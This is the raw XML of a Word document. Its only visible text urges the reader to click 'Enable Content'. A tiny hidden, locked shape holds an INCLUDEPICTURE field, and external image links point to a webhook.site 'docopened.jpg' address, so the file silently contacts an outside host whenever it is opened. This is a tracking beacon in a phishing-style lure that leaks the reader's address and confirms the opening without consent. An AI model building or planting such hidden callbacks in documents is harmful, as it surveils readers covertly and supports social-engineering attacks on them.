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color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
        <w:tag w:val="EnableContent"/>
        <w:id w:val="1319540396"/>
        <w:lock w:val="contentLocked"/>
        <w:placeholder>
          <w:docPart w:val="DefaultPlaceholder_-1854013440"/>
        </w:placeholder>
        <w15:appearance w15:val="hidden"/>
      </w:sdtPr>
      <w:sdtEndPr/>
      <w:sdtContent>
        <w:p w14:paraId="6D59372F" w14:textId="12790FCD" w:rsidR="00102C42" w:rsidRDefault="007D0778" w:rsidP="007D0778">
          <w:pPr>
            <w:rPr>
              <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
              <w:sz w:val="28"/>
              <w:szCs w:val="28"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="007D0778">
            <w:rPr>
              <w:noProof/>
              <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:drawing>
              <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4959509D" wp14:editId="7DAB731E">
                <wp:extent cx="121920" cy="12192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1920" cy="1219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Pr="007D0778">
            <w:rPr>
              <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t xml:space="preserve"> The document content is not displayed, click the "Enable Content" button above.</w:t>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="4E222122" w14:textId="7ABF271D" w:rsidR="00AA038F" w:rsidRDefault="00A60EDE" w:rsidP="007D0778">
      <w:pPr>
        <w:rPr>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val="es-ES"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
          <w:color w:val="7F7F7F" w:themeColor="text1" w:themeTint="80"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
          <w:lang w:val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24C7CFF" wp14:editId="06D3E49D">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>83820</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>53975</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="45719" cy="45719"/>
                <wp:effectExtent l="57150" t="19050" r="50165" b="12065"/>
                <wp:wrapNone/>
                <wp:docPr id="749763772" name="Rectangle: Rounded Corner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719" cy="45719"/>
                        </a:xfrm>
                        <a:prstGeom prst="round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1F043FC" w14:textId="1E34D5D6" w:rsidR="00A60EDE" w:rsidRDefault="00A60EDE" w:rsidP="00A60EDE">
                            <w:pPr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 w:rsidRPr="00A60EDE">
                              <w:instrText>INCLUDEPICTURE "http://webhook.site/68d68fc7-aa94-4f2d-a727-d18fb40b0d69/docopened.jpg" \d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>
                              <w:pict w14:anchorId="32502C0C">
                                <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:101.4pt;height:101.4pt">
                                  <v:imagedata r:id="rId7"/>
                                </v:shape>
                              </w:pic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124C7CFF" id="Rectangle: Rounded Corners 1" o:spid="_x0000_s1026" style="position:absolute;margin-left:6.6pt;margin-top:4.25pt;width:3.6pt;height:3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" filled="f" stroked="f">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="31F043FC" w14:textId="1E34D5D6" w:rsidR="00A60EDE" w:rsidRDefault="00A60EDE" w:rsidP="00A60EDE"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 xml:space="preserve"> </w:instrText>
                      </w:r>
                      <w:r w:rsidRPr="00A60EDE">
                        <w:instrText>INCLUDEPICTURE "http://webhook.site/68d68fc7-aa94-4f2d-a727-d18fb40b0d69/docopened.jpg" \d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>
                        <w:pict w14:anchorId="32502C0C">
                          <v:shape id="_x0000_i1026" type="#_x0000_t75" style="width:101.4pt;height:101.4pt">
                            <v:imagedata r:id="rId8"/>
                          </v:shape>
                        </w:pict>
                      </w:r>
                      <w:r>
                        <w:fldChar w:fldCharType="end"/>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00AA0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w14:anchorId="4959509D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Picture 1" o:spid="_x0000_i1026" type="#_x0000_t75" style="width:36pt;height:36pt;visibility:visible;mso-wrap-style:square" o:bullet="t">
        <v:imagedata r:id="rId1" o:title=""/>
      </v:shape>
    </w:pict>
  </w:numPicBullet>
  <w:abstractNum w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="639C298A"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="8D28CD5E"/>
    <w:lvl w:ilvl="0" w:tplc="2E3CFF56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F2E30B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10A034B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2CF870E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AE4B3C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8C74A0CE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8D8803B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6D2C8A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3E5A863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 w16cid:durableId="1942714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160B"/>
    <w:rsid w:val="00003585"/>
    <w:rsid w:val="00014EFF"/>
    <w:rsid w:val="0002206A"/>
    <w:rsid w:val="00095008"/>
    <w:rsid w:val="000A18F2"/>
    <w:rsid w:val="000C107A"/>
    <w:rsid w:val="000C4BC2"/>
    <w:rsid w:val="00102C42"/>
    <w:rsid w:val="00103723"/>
    <w:rsid w:val="001042AB"/>
    <w:rsid w:val="00131240"/>
    <w:rsid w:val="001357F1"/>
    <w:rsid w:val="00140FDD"/>
    <w:rsid w:val="00156842"/>
    <w:rsid w:val="00175D58"/>
    <w:rsid w:val="001977E4"/>
    <w:rsid w:val="001A20C3"/>
    <w:rsid w:val="001C4E92"/>
    <w:rsid w:val="001D3D1E"/>
    <w:rsid w:val="001E2E2C"/>
    <w:rsid w:val="001F54FD"/>
    <w:rsid w:val="002073B0"/>
    <w:rsid w:val="002110EE"/>
    <w:rsid w:val="00217CDB"/>
    <w:rsid w:val="00223CF5"/>
    <w:rsid w:val="00236FF5"/>
    <w:rsid w:val="0024290F"/>
    <w:rsid w:val="00255200"/>
    <w:rsid w:val="00282D63"/>
    <w:rsid w:val="002964D4"/>
    <w:rsid w:val="002A1CBC"/>
    <w:rsid w:val="002D20E8"/>
    <w:rsid w:val="002D58CB"/>
    <w:rsid w:val="00316EA4"/>
    <w:rsid w:val="00334413"/>
    <w:rsid w:val="00337F79"/>
    <w:rsid w:val="00340E5E"/>
    <w:rsid w:val="003478EA"/>
    <w:rsid w:val="0036176C"/>
    <w:rsid w:val="0037153E"/>
    <w:rsid w:val="0039548E"/>
    <w:rsid w:val="0039572A"/>
    <w:rsid w:val="003D72F9"/>
    <w:rsid w:val="003E4F48"/>
    <w:rsid w:val="003F0A69"/>
    <w:rsid w:val="00403C48"/>
    <w:rsid w:val="0041083E"/>
    <w:rsid w:val="00444895"/>
    <w:rsid w:val="0046347E"/>
    <w:rsid w:val="004916FA"/>
    <w:rsid w:val="0049218D"/>
    <w:rsid w:val="004A34BE"/>
    <w:rsid w:val="004C253E"/>
    <w:rsid w:val="004F6C4E"/>
    <w:rsid w:val="005061DC"/>
    <w:rsid w:val="00512E81"/>
    <w:rsid w:val="00517264"/>
    <w:rsid w:val="00521A90"/>
    <w:rsid w:val="00526429"/>
    <w:rsid w:val="005371D1"/>
    <w:rsid w:val="00554195"/>
    <w:rsid w:val="0058028D"/>
    <w:rsid w:val="00584B28"/>
    <w:rsid w:val="00624819"/>
    <w:rsid w:val="00643CDE"/>
    <w:rsid w:val="00655C87"/>
    <w:rsid w:val="006830FE"/>
    <w:rsid w:val="006E0A66"/>
    <w:rsid w:val="00700EFC"/>
    <w:rsid w:val="00717CB3"/>
    <w:rsid w:val="00722B26"/>
    <w:rsid w:val="007457DE"/>
    <w:rsid w:val="00783E4F"/>
    <w:rsid w:val="00796E1C"/>
    <w:rsid w:val="007A00F3"/>
    <w:rsid w:val="007A5EF9"/>
    <w:rsid w:val="007B21B7"/>
    <w:rsid w:val="007D0778"/>
    <w:rsid w:val="007E1CA2"/>
    <w:rsid w:val="007E2397"/>
    <w:rsid w:val="00804AD4"/>
    <w:rsid w:val="0087008F"/>
    <w:rsid w:val="008A3EDA"/>
    <w:rsid w:val="008B280D"/>
    <w:rsid w:val="008E247E"/>
    <w:rsid w:val="008E482B"/>
    <w:rsid w:val="009023B0"/>
    <w:rsid w:val="009528CE"/>
    <w:rsid w:val="00982063"/>
    <w:rsid w:val="009B5D9B"/>
    <w:rsid w:val="00A33D18"/>
    <w:rsid w:val="00A36300"/>
    <w:rsid w:val="00A454EA"/>
    <w:rsid w:val="00A535D1"/>
    <w:rsid w:val="00A60EDE"/>
    <w:rsid w:val="00A63FDF"/>
    <w:rsid w:val="00A6623F"/>
    <w:rsid w:val="00A73183"/>
    <w:rsid w:val="00A73A32"/>
    <w:rsid w:val="00A91816"/>
    <w:rsid w:val="00A95FD4"/>
    <w:rsid w:val="00AA038F"/>
    <w:rsid w:val="00AC081B"/>
    <w:rsid w:val="00AF44DE"/>
    <w:rsid w:val="00AF6886"/>
    <w:rsid w:val="00B34858"/>
    <w:rsid w:val="00B37746"/>
    <w:rsid w:val="00B4160B"/>
    <w:rsid w:val="00B46FEF"/>
    <w:rsid w:val="00B837B5"/>
    <w:rsid w:val="00B869DD"/>
    <w:rsid w:val="00BE39D4"/>
    <w:rsid w:val="00C41581"/>
    <w:rsid w:val="00C428E8"/>
    <w:rsid w:val="00C600C0"/>
    <w:rsid w:val="00C80F26"/>
    <w:rsid w:val="00C94932"/>
    <w:rsid w:val="00CA344D"/>
    <w:rsid w:val="00CA6227"/>
    <w:rsid w:val="00CD1459"/>
    <w:rsid w:val="00CE5847"/>
    <w:rsid w:val="00CE5E94"/>
    <w:rsid w:val="00D4239E"/>
    <w:rsid w:val="00D44387"/>
    <w:rsid w:val="00D76114"/>
    <w:rsid w:val="00D962D0"/>
    <w:rsid w:val="00DA0AAC"/>
    <w:rsid w:val="00E06C0D"/>
    <w:rsid w:val="00E27813"/>
    <w:rsid w:val="00E30E37"/>
    <w:rsid w:val="00E32955"/>
    <w:rsid w:val="00E33F4E"/>
    <w:rsid w:val="00E957EA"/>
    <w:rsid w:val="00EC18A7"/>
    <w:rsid w:val="00EC6EBE"/>
    <w:rsid w:val="00EC6FE0"/>
    <w:rsid w:val="00ED2C45"/>
    <w:rsid w:val="00F220CE"/>
    <w:rsid w:val="00F32707"/>
    <w:rsid w:val="00F71F4C"/>
    <w:rsid w:val="00F7788B"/>
    <w:rsid w:val="00FC0CFE"/>
    <w:rsid w:val="00FC5C11"/>
    <w:rsid w:val="00FD4891"/>
    <w:rsid w:val="00FE08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9A83722"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{7615843D-7456-47EC-97F1-D7C66772AB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102C42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7D0778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http://webhook.site/68d68fc7-aa94-4f2d-a727-d18fb40b0d69/docopened.jpg" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="http://webhook.site/68d68fc7-aa94-4f2d-a727-d18fb40b0d69/docopened.jpg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ABBBF3-460B-4135-B3B1-128F91106358}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00111298" w:rsidRDefault="00111298">
          <w:r w:rsidRPr="00471E9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298"/>
    <w:rsid w:val="00111298"/>
    <w:rsid w:val="001357F1"/>
    <w:rsid w:val="001977E4"/>
    <w:rsid w:val="00282D63"/>
    <w:rsid w:val="002964D4"/>
    <w:rsid w:val="00337F79"/>
    <w:rsid w:val="005371D1"/>
    <w:rsid w:val="00804AD4"/>
    <w:rsid w:val="008E247E"/>
    <w:rsid w:val="008E482B"/>
    <w:rsid w:val="009023B0"/>
    <w:rsid w:val="009B5D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1129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8655</TotalTime>
  <Pages>1</Pages>
  <Words>12</Words>
  <Characters>74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141</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-06-23T06:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-12-03T09:33:00Z</dcterms:modified>
</cp:coreProperties>
</file>